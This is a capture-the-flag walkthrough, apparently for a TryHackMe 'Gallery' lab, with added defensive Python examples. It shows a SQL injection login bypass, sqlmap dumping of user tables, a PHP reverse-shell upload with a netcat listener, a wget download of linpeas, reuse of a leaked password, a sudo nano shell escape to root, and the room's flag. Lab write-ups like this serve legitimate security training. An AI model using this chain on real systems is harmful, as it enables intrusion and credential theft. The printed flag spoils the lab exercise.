Gallery

Try to exploit our image gallery system

Introduction

First, let's start the machine and answer the questions.

How Many Ports Are open?

First, let's scan the IP 10.10.27.38:

nmap -sCV 10.10.27.38

There are two ports open, 80 and 8080. Let's navigate to http://10.10.27.38:8080. The login page looks like it could be vulnerable to SQL injection, so I tried to log in with 'OR 1=1-- - (user:pass), and it works. Now let's go to https://www.exploit-db.com/ and type Simple Image Gallery in the search filter. The entry there says the application is vulnerable to SQL injection, so let's read that exploit and do the same as it describes. Go to Albums, click on Sample images and, once there, turn on intercept in Burp and turn on FoxyProxy (or your favorite way). With Burp Suite intercepting, click on any image; I clicked on test.jpg. I intercepted the request and, as the exploit says, we have to save it now; I saved the request as gallery.test. Let's run the command

sqlmap -r gallery.test --dbs
  1. sqlmap invokes sqlmap
  2. -r gallery.test uses a file containing an HTTP request to test for SQL injection
  3. --dbs enumerates the available databases if a SQL injection vulnerability is found.

After that, we find the databases. Now that we have found the DB, let's run this command

sqlmap -r gallery.test -D gallery_db --tables --dbs
  1. -D selects the database
  2. --tables enumerates the tables within the selected database

After running that command we find something more. Now that we have those tables, users sounds interesting, so let's run this command

sqlmap -r gallery.test -D gallery_db -T users --dump
  1. -T selects the users table
  2. --dump Extracts and shows the entire content of the users table.
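The login bypass and the sqlmap dump above work because the application builds its SQL from the submitted fields. As an added illustration (not the gallery's code; the users table and the query shape are assumptions), here is the same login query in string-built and parameterised form, run against an in-memory SQLite database. The payload is the one from the write-up, assumed to be sent in the username field and written with a space after the quote so the tokenisation is unambiguous.

```python
import sqlite3

# Constructed stand-in for the gallery's users table (schema is assumed,
# not taken from the real application).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: the submitted text becomes part of the SQL syntax."""
    sql = f"SELECT id FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Payload from the write-up. In the vulnerable query it closes the username
# literal, adds an always-true condition and comments out the password check.
BYPASS = "' OR 1=1-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with bypass payload:", login_vulnerable(db, BYPASS, "pass"))
    print("safe login with bypass payload:      ", login_safe(db, BYPASS, "pass"))
    print("safe login with real credentials:    ", login_safe(db, "admin", "correct-horse"))
```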

After running that command we get the dump, which gives us almost all the answers for task 1. Let's go back to http://10.10.27.38:8080, click on Albums, go to Sample images and then click on Add new. Before uploading anything, go to https://pentestmonkey.net/tools/web-shells/php-reverse-shell and configure the script. After you have configured your script, upload the file. Before doing anything else, let's set up a listener in our terminal

nc -nlvp 4444

nc calls netcat

  1. -n avoids DNS resolution in netcat
  2. -l puts netcat in listening mode, waiting for incoming connections
  3. -v enables verbose mode (more details)
  4. -p specifies the port to listen on
  5. 4444 is the chosen port number

Then click on the file that we uploaded before, and we get the shell. As you can see, I tried to read user.txt but I don't have permission. Then, on the target machine, I move to /var/www/html with cd /var/www/html; in that directory I have enough permissions.

Then on my own machine I set up a server to serve linpeas.sh to the target machine.

On the target machine I run this command to get linpeas.sh:

wget http://0.0.0.0:8080/linpeas.sh

Now let's run linpeas. Before that, give it execute permissions with chmod +x linpeas.sh, then run ./linpeas.sh. After running the script, we find this: it means that mike was trying to log in but, by mistake, he put the password in a command. But let's confirm first by looking at the bash history. As we can see he was trying to do something, but he didn't notice that the password ended up in .bash_history. Now let's change user with su mike and the password b3stpassw0rdbr0xx, and it works. Now let's read user.txt.

After that, if we type sudo -l, it says this:

sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

The script /opt/rootkit.sh contains this:

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

If we type this

sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.

There is an error, so let's run export TERM=xterm to set the terminal type. Then go to https://gtfobins.github.io/gtfobins/nano/#sudo.

With TERM exported we get access to nano when we run the script with

sudo /bin/bash /opt/rootkit.sh

Then press CTRL + R, type reset; sh 1>&0 2>&0 and press CTRL + X; after that we have root access.

Here we go:

# whoami
root
cd root/
cat root.txt
THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}
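The sudo rule above is dangerous because the script it allows runs an editor as root, and editors such as nano can spawn a shell. As an added example that is not part of the write-up or the room, here is a small audit script that parses sudo -l output, looks up the scripts the rules reference and flags lines that invoke an editor, pager or interpreter. The sample input is the rule and script from this page; the RISKY_BINARIES list is an assumption and can be extended.

```python
import re

# Binaries that give a root shell or arbitrary file access when reached through
# sudo (nano is the one this write-up abuses; the others are common GTFOBins).
RISKY_BINARIES = {"nano", "vi", "vim", "less", "more", "sh", "bash", "python3", "perl"}
# Matches a "(runas) [NOPASSWD:] command" line of `sudo -l` output.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmd>\S.*?)\s*$")

# Constructed sample input: the sudo -l rule and the script shown in the write-up.
SAMPLE_SUDO_L = """User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
"""
SAMPLE_SCRIPTS = {"/opt/rootkit.sh": """#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
case $ans in
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
"""}

def parse_sudo_rules(sudo_l_output):
    """Return {runas, nopasswd, cmd} for each rule line in `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"], "nopasswd": bool(m["nopasswd"]), "cmd": m["cmd"]})
    return rules

def risky_calls(script_text):
    """Non-comment script lines that invoke one of RISKY_BINARIES."""
    hits = []
    for line in script_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = re.split(r"[\s;|&()]+", stripped)
        if any(t.rsplit("/", 1)[-1] in RISKY_BINARIES for t in tokens):
            hits.append(stripped)
    return hits

def audit(sudo_l_output, scripts):
    """Findings: rules running as root whose script reaches a risky binary."""
    findings = []
    for rule in parse_sudo_rules(sudo_l_output):
        if rule["runas"] != "root":
            continue
        for path, text in scripts.items():
            if path in rule["cmd"]:
                findings += [f"{rule['cmd']} -> {path}: {hit}" for hit in risky_calls(text)]
    return findings
```

Replacing the nano call with a non-interactive reader such as /bin/cat makes the finding disappear, which is the fix a defender would apply here.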

NOTE

If you see any grammatical errors, excuse me, I'm learning English :(

This post is licensed under CC BY 4.0 by the author.
